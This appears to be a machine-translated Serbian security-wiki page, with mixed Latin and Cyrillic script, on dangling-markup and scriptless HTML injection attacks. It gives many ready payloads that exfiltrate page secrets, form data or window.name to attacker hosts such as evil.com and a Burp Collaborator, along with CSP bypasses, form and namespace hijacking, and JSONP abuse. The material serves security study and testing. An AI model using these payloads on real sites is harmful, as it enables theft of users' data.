Dangling Markup - HTML scriptless injection

Resume

Ova tehnika se može koristiti za ekstrakciju informacija od korisnika kada se pronađe HTML injekcija. Ovo je veoma korisno ako ne pronađete način da iskoristite XSS ali možete ubaciti neke HTML tagove. Takođe je korisno ako je neka tajna sačuvana u čistom tekstu u HTML-u i želite da je izvučete od klijenta, ili ako želite da obmanete neku izvršavanje skripte.

Nekoliko tehnika komentisanih ovde može se koristiti za zaobilaženje nekih Content Security Policy eksfiltracijom informacija na neočekivane načine (html tagovi, CSS, http-meta tagovi, forme, base...).

Main Applications

Stealing clear text secrets

Ako ubacite <img src='http://evil.com/log.cgi? kada se stranica učita, žrtva će vam poslati sav kod između ubačenog img taga i sledeće navodnike unutar koda. Ako se neka tajna nekako nalazi u tom delu, ukrasti ćete je (možete uraditi istu stvar koristeći dvostruke navodnike, pogledajte šta bi moglo biti zanimljivije za korišćenje).

Ako je img tag zabranjen (zbog CSP-a na primer) možete takođe koristiti <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?

<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=

Napomena da Chrome blokira HTTP URL-ove sa "<" ili "\n" u njima, pa možete pokušati sa drugim protokolima kao što je "ftp".

Takođe možete zloupotrebiti CSS @import (će poslati sav kod dok ne pronađe ";")

<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;

Možete takođe koristiti <table:

<table background='//your-collaborator-id.burpcollaborator.net?'

Možete takođe umetnuti <base tag. Sve informacije će biti poslate dok se citat ne zatvori, ali zahteva neku interakciju korisnika (korisnik mora da klikne na neki link, jer će <base tag promeniti domen na koji link upućuje):

<base target='        <--- Injected
steal me'<b>test</b>

Krađa obrazaca

<base href='http://evil.com/'>

Zatim, forme koje šalju podatke na putanju (kao što je <form action='update_profile.php'>) će slati podatke na zloćudnu domenu.

Krađa formi 2

Postavite zaglavlje forme: <form action='http://evil.com/log_steal'> ovo će prepisati sledeće zaglavlje forme i svi podaci iz forme će biti poslati napadaču.

Krađa formi 3

Dugme može promeniti URL na koji će informacije iz forme biti poslate sa atributom "formaction":

<button name=xss type=submit formaction='https://google.com'>I get consumed!

Napadač može koristiti ovo da ukrade informacije.

Pronađite primer ovog napada u ovom izveštaju.

Krađa tajni u čistom tekstu 2

Koristeći najnoviju pomenutu tehniku za krađu formi (ubacivanje novog zaglavlja forme) možete zatim ubaciti novo polje za unos:

<input type='hidden' name='review_body' value="

и ово поље за унос ће садржати сав садржај између његових двоструких наводника и следећих двоструких наводника у HTML-у. Овај напад комбинује "Krađa tajnih podataka u čistom tekstu" са "Krađa formi2".

Можете урадити исту ствар инјектовањем форме и <option> тагом. Сви подаци до затвореног </option> ће бити послати:

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

Form parameter injection

Možete promeniti putanju forme i uneti nove vrednosti tako da će se izvršiti neočekivana radnja:

<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

Krađa tajni u čistom tekstu putem noscript

<noscript></noscript> Je oznaka čiji sadržaj će biti interpretiran ako pregledač ne podržava javascript (možete omogućiti/onemogućiti Javascript u Chrome-u na chrome://settings/content/javascript).

Način da se exfiltrira sadržaj web stranice od tačke injekcije do dna na sajt koji kontroliše napadač biće injektovanje ovog:

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

Bypassing CSP with user interaction

Iz ovog portswiggers istraživanja možete saznati da čak i iz najviše CSP ograničenih okruženja možete još uvek izvući podatke uz malo interakcije korisnika. U ovoj prilici ćemo koristiti payload:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

Napomena da ćete tražiti od žrtve da klikne na link koji će ga preusmeriti na payload koji kontrolišete. Takođe, napomena da će target atribut unutar base taga sadržati HTML sadržaj do sledeće jednostavne navodnike. To će učiniti da će vrednost window.name ako se link klikne biti sav taj HTML sadržaj. Stoga, pošto kontrolišete stranicu na kojoj žrtva pristupa klikom na link, možete pristupiti tom window.name i ekstraktovati te podatke:

<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>

Zavaravajući tok skripte 1 - HTML namespace napad

Umetnite novu oznaku sa id unutar HTML-a koja će prepisati sledeću i sa vrednošću koja će uticati na tok skripte. U ovom primeru birate sa kim će se informacija deliti:

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}

Zavaravajući tok skripte 2 - Napad na prostor imena skripte

Kreirajte promenljive unutar javascript prostora imena umetajući HTML tagove. Tada će ova promenljiva uticati na tok aplikacije:

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}

Zloupotreba JSONP-a

Ako pronađete JSONP interfejs, mogli biste biti u mogućnosti da pozovete proizvoljnu funkciju sa proizvoljnim podacima:

<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })

Ili možete čak pokušati da izvršite neki javascript:

<script src='/search?q=a&call=alert(1)'></script>

Iframe zloupotreba

Dečiji dokument ima mogućnost da pregleda i menja location svojstvo svog roditelja, čak i u situacijama sa različitim poreklima. To omogućava umetanje skripte unutar iframe koja može preusmeriti klijenta na proizvoljnu stranicu:

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

Ovo se može ublažiti nečim poput: sandbox=' allow-scripts allow-top-navigation'

Iframe se takođe može zloupotrebiti da bi se iscurile osetljive informacije sa druge stranice koristeći atribut imena iframe-a. To je zato što možete kreirati iframe koji se sam iframe-uje zloupotrebljavajući HTML injekciju koja čini da osetljive informacije izgledaju unutar atributa imena iframe-a i zatim pristupiti tom imenu iz inicijalnog iframe-a i iscuriti ga.

<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

Za više informacija proverite https://portswigger.net/research/bypassing-csp-with-dangling-iframes

<meta zloupotreba

Možete koristiti meta http-equiv za izvršavanje several actions kao što je postavljanje kolačića: <meta http-equiv="Set-Cookie" Content="SESSID=1"> ili izvršavanje preusmeravanja (u 5s u ovom slučaju): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

Ovo se može izbeći sa CSP u vezi sa http-equiv ( Content-Security-Policy: default-src 'self';, ili Content-Security-Policy: http-equiv 'self';)

Novi <portal HTML tag

Možete pronaći veoma zanimljivo istraživanje o iskoristivim ranjivostima <portal taga ovde. U trenutku pisanja ovog teksta potrebno je omogućiti portal tag na Chrome-u u chrome://flags/#enable-portals ili neće raditi.

<portal src='https://attacker-server?

HTML Leaks

Nisu svi načini za curenje povezanosti u HTML-u korisni za Dangling Markup, ali ponekad mogu pomoći. Proverite ih ovde: https://github.com/cure53/HTTPLeaks/blob/master/leak.html

SS-Leaks

Ovo je mešavina između dangling markup i XS-Leaks. S jedne strane, ranjivost omogućava injekciju HTML-a (ali ne JS) na stranicu iste domene kao one koju ćemo napadati. S druge strane, nećemo napadati direktno stranicu na kojoj možemo injektovati HTML, već druguu stranicu.

XS-Search/XS-Leaks

XS-Search su orijentisane na ekstrakciju informacija iz različitih domena zloupotrebom napada putem bočnih kanala. Stoga, to je drugačija tehnika od Dangling Markup, međutim, neke od tehnika zloupotrebljavaju uključivanje HTML tagova (sa i bez izvršavanja JS), kao što su CSS Injection ili Lazy Load Images.

Brute-Force Detection List

References

• https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057

• http://lcamtuf.coredump.cx/postxss/

• http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/

• https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup